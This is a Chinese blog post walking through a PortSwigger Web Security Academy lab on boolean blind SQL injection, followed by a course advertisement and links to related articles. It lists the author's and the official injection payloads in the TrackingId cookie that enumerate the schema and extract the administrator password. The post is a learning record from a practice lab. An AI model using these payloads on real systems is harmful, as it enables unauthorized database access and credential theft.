【PortSwiggerのWeb Security Academy靶场】SQL Injection系列 9th

最新推荐文章于 2025-05-31 10:26:13 发布
最新推荐文章于 2025-05-31 10:26:13 发布
阅读量277 收藏
点赞数
文章标签: sql 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hhhhhggghbhh/article/details/128298175
版权
本文详细介绍了在PortSwigger的Web Security Academy中进行Blind SQL Injection的实验室,包括确认注入点、爆破数据库名、表名、字段名以及数据的过程。遇到的难点在于某些函数如group_concat和limit无法使用,但通过调整payload,成功揭示了字段username和password。同时,提供了官方解析和针对初学者的学习资源。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Subject

Lab: Blind SQL injection with conditional responses

Url: portswigger.net/web-securit…

Mind Palace

在带着 cookies的后续访问网页时会找到出现的 Welcome back! 标志 ==> 无法回显 ==> 采用盲注的方式

0x01 确认注入点

0x02 爆破数据库名

# 测试information_schema是否可以利用
id' and substring(select 'a' from information_schema.tables limit 1,1,1) = 'a
id' and ascii(substring((select 'a' from information_schema.tables limit 1),1,1)) = 97--
# ==> 可以利用 

# 构造核心payload
id' and ascii(substring((select table_schema from information_schema.tables limit 1),{i},1)) > {mid}--
# ==> database name: public

0x03 爆破表名

# 构造核心payload
id' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema='public' limit 1),{i},1)) > {mid}--
# ==> table name: users

0x04 爆破字段名

# 构造核心payload
id' and ascii(substring((select concat(column_name) from information_schema.columns where table_name='users' limit 1),{i},1)) > {mid}--
# ==> column name: username 有痛点无法解决

无法解决的痛点:group_concat函数无法使用(与此同时concat函数可以正常使用);没有limit 1无法select出结果(与此同时limit 0,1 limit 1,1无法select出结果)==> 导致的结果:没有办法一次性爆破出所有的select的结构 每次只能输出最上面select出的结果

无法解决痛点导致只能爆破出一个字段名字:username(不过题目描述中表明了另一个字段的名字就是:password;所以先在这里插个眼等之后看如何解决上述痛点;先用payload证明一下另一个字段名确实是password

id' and (select 'a' from public.users where username='administrator' and length(password)>1) = 'a

猜测:痛点的关键可能是在payload中最后使用了--注释符导致的

id' and substring((select column_name from information_schema.columns where table_name='users' limit 1),1,1) < 'z
# ==> 失败

不用注释符还是没能解决group_concat和limit的问题(可能是数据库不支持这个函数?limit也不能使用就很奇怪。插眼。)

0x05 爆破数据

# 构造核心payload
id' and ascii(substring((select concat(password,'~',username) from users where username='administrator'),1,1)) > 32--
# where username='administrator' ==> password='ybi0bomgnupogefkhiuw'

源码URL

gitee.com/eclipse-ten…

Look Ahead

关于官方解析

# 判断注入点
TrackingId=xyz' AND '1'='1

# 确认表名
TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a

# 确认字段名和administrator用户的存在
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a

# 确认password长度
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a

# BP的Intruder模块爆破password
TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a

很奇怪的是今天刚做的几个靶场,group_concat() database() limit都表现不佳;原因不明;若有小伙伴碰巧看见这篇博客知道是什么原因 请在评论区为萌新解下惑 Thanks♪(・ω・)ノ

END ─=≡Σ(((つ•̀ω•́)つ

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

hhhhhggghbhh
关注
portswigger靶场SQL注入实验(下)
m0_51313985的博客
10-03 2593
实验9 点击了home之后页面给了回显,猜测后面进行盲注的时候要利用此回显来判断,打开bp吧 注入点在trackingid这,简单判断一下 存在注入,下面判断一下是否存在表users,表里是否存在名为administrator的用户以及密码password有多少字符 为真,存在users表,接着查用户 后面判断password的长度 大于1为真,扩大点看看 大于30无回显,长度应该是小于30的,具体多少跑一下payload吧 选择number范围1-30 到20,在确定了密码的长度之
PortSwiggerWeb Security Academy靶场SQL Injection系列 10th1
javagty6778的博客
01-05 355
Lab: Blind SQL injection with conditional errorsUrl: portswigger.net/web-securit…不论如何点击,带与不带cookie,页面(HTTP response)是没有任何变化的;那么我们尝试让他报点错双引号正常回显 ==> 验证了是注入点,并且可以通过报错信息进行帮助的condition判断后续: exp代码 gitee.com/eclipse-ten…END (づ。◕‿‿◕。)づ
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
weixin_60677557的博客
07-05 2805
SQL注入(SQLi)是一种Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或行为发生持久更改。在某些情况下,攻击者可以升级SQL注入攻击以危及底层服务器或其他后端基础架构,或执行拒绝服务攻击。
portswigger靶场学习笔记(一)sqli注入
weixin_52835927的博客
10-08 552
在本次靶场开始联系之前,已经学习了sqli-labs,pikachu,DVWA三个靶场,在学习portswigger的时候,我准备从较为熟悉的sqli注入部分开始。
【送书活动第2期】打靶Portswigger系列—— 一口气通关18个SQL注入靶场详细流程(文末送书)
05-22 1929
BurpSuite自带就有靶场,而BP又是全球最牛的渗透工具之一,是国外专业安全团队长期维护的项目,所以安全学院做得非常不错,里面的靶场(安全实验室Libs)包含了几乎所有常见的Web漏洞,在2024年的今天,我是十分推荐大家去使用的!!
【burpsuite安全练兵场-客户端11】跨站点脚本XSS-10个实验(下)
01-14 1万+
【BP靶场portswigger-客户端11-跨站点脚本XSS】10个实验-万文详细步骤
portswigger靶场sql注入(一)
wzhwzh123321的博客
01-26 561
portswigger靶场sql注入
【burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
热门推荐
12-27 1万+
【BP靶场-服务端-SQL注入】16个实验-万文详细步骤
解决:MySQL client, error code: 1251, SQLState: 08004
liulilittle的博客
05-28 346
MySQL认证协议不兼容问题解决方案:客户端报错1251是由于MySQL 8.0默认使用caching_sha2_password认证方式,而旧客户端不支持。可通过修改用户认证插件为mysql_native_password解决。修复步骤:1)执行ALTER USER修改认证方式;2)FLUSH PRIVILEGES刷新权限。该方法可快速解决客户端连接认证失败问题,适用于MySQL 8.0与旧版客户端的兼容场景。
pgsql 查看每张表大小
狼魂之力
05-27 810
pg_size_pretty(pg_total_relation_size(‘表名’)) AS 总大小;pg_size_pretty(pg_relation_size(‘表名’)) AS 数据大小,pg_size_pretty(pg_indexes_size(‘表名’)) AS 索引大小,如果没有显示,右键点击表 → 选择"属性" → 在"存储"标签页查看详细大小信息。在表列表中,默认会显示"大小"列(以简洁格式如16K、80K显示)在表列表中右键 → “查看” → 勾选"大小"列(如果默认未显示)
如何收集Oracle DB SQL Monitor报告
huiyangxu blog
05-28 528
可以通过企业管理器云控制(Enterprise Manager Cloud Control)或企业管理器数据库 express 版(EM Express),在性能中心(通过 “性能” 菜单进入)的 “已监控 SQL” 选项卡中,直接访问活动 SQL 监视器报告。可以通过sqldeveloper 管理工具–优化–实时SQL监视,选中要生成报告的SQL,点保存按钮就可以直接保存到本地。下面是12C的示例,如果你的网络里有统一管理的EM也可以查看。工具虽然是免费的,但是前提你要有相应的授权。
SQL进阶之旅 Day 5: 常用函数与表达式
在未来等你的专栏
05-27 479
本篇文章详细介绍了 SQL 中常用的函数和表达式,包括聚合函数、日期函数和条件表达式。通过理论讲解、代码示例和性能对比,帮助读者深入理解这些工具的使用方法和底层原理。此外,还提供了多个实际案例,展示了如何在工作中应用这些技术。下一篇文章将聚焦于“窗口函数实用技巧”,介绍ROW_NUMBERRANK和DENSE_RANK的使用场景和优化策略。
PostgreSQL的聚集函数
ai agent知识
05-29 504
PostgreSQL的聚集函数(如count、sum、avg、max、min)能高效处理数据统计需求。通过WHERE子句实现预筛选,GROUP BY进行分组统计,HAVING过滤分组结果,FILTER实现精细化计算控制。这些功能组合使用可精准完成数据筛选、分组和统计分析,提升数据处理效率,是数据分析中的实用工具。合理运用这些技巧能让数据库查询更加灵活高效。
PostgreSQL如何更新和删除表数据
ai agent知识
05-29 278
摘要:本文介绍了SQL中UPDATE和DELETE命令的使用方法。UPDATE用于修改数据(如将杭州5月12日气温降低2度),DELETE用于删除数据(如删除杭州的所有天气记录)。特别警告不带WHERE条件的DELETE会清空整张表,建议使用TRUNCATE命令进行表清空操作。
经典SQL查询问题的练习第一天
2301_80002241的博客
05-29 441
本文展示了基于学生表、课程表和成绩表的8个SQL查询示例。主要包括:计算单科总成绩(①)和选课人数(②);获取各科最高最低分(③)和每门课选课人数(④);查询平均成绩高于60分(⑤)和选修3门课以上(⑥)的学生;找出有不及格记录(⑦)及两门以上不及格(⑧)的学生姓名。所有查询都基于聚合函数(SUM/COUNT/MAX/MIN/AVG)和分组(GROUP BY)操作,涉及单表查询和多表连接(LEFT JOIN),并使用了WHERE和HAVING条件筛选。
SQL输出20个9
chinalog的专栏
05-28 413
最简单直接的方法是第一种使用REPLICATE函数,它会返回由指定字符串重复指定次数后组成的字符串。
数据库只更新特定字段的两种方式(先读后写 vs. 动态组织 SQL)-golang SQLx 实现代码(动态组织 SQL
最新发布
西京刀客
05-31 584
数据库只更新特定字段的两种方式(先读后写 vs. 动态组织 SQL)-golang SQLx 实现代码(动态组织 SQL
PostgreSQL部署
2503_91100205的博客
05-30 776
在数据驱动的时代,数据库作为业务系统的核心组件,其性能、扩展性和可靠性至关重要。PostgreSQL作为全球领先的开源关系型数据库,凭借其ACID事务特性多版本并发控制(MVCC)丰富的数据类型支持(如JSON、地理空间数据)以及活跃的开源生态,成为从初创项目到企业级应用的首选方案。无论是高并发OLTP场景,还是大数据分析、物联网数据存储,PostgreSQL都能提供强大支撑。本文将从核心特性、安装实践、逻辑与物理架构等维度,带您全面掌握这一数据库利器。PostgreSQL以其功能全面性开源生态活力和。
portswigger SQL注入
02-04
Portswigger Web Security Academy 提供了详尽的 SQL 注入学习路径,帮助理解不同类型的攻击向量及其防御措施。平台上的课程设计旨在通过实践操作来掌握技能。 #### 学习路径概述 Web Security AcademySQL 注入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值